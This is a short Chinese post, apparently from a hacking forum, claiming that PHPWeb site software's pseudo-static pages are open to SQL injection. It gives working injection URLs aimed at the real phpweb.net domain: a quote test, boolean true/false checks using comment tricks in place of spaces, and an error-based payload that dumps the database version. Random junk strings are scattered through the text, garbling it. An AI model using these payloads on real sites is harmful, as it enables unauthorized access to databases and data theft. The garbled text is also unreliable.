phpweb所有的整站程序伪静态页面都存在sql注入- K) M7 \7 H& Y; h. u
) X" u' e* M7 p( A3 \3 k! t' _
主站:http://phpweb.net/1 h7 N* J- u) G9 @
加’检测:
0 _5 |6 x8 H- Q& E3 r( s " U, K* L* m8 D2 {9 A
http://www.phpweb.net/down/html/?772′.html
1 p# b+ G) r! L) G1 D& a
* q8 y% d+ N" h8 C" x0 A# x8 @+ N$ I出错) q+ [6 B1 s- M) c y
存在注入。# k/ Z, Q7 d4 o5 p0 h |4 M3 V
不能用空格,只能用/*罗
( a- M/ d8 p' Ihttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常! k: L/ j7 J: P m
9 o5 A' T- t# A0 ^
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.( v% x7 T! v4 t9 i1 o: ?
爆数据库版本:; M8 ?0 F# H8 ?0 j
3 C. N9 b( Z6 r- ?8 s
?
+ w7 _+ J3 i Z" [7 M1( q. q6 c6 y6 a9 R
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
: J: h# n% Y- W* {更新日期: 2013-01-03 13:39:50
/ ^: k) V2 K- `7 i i: C4 V* s0 P/ d |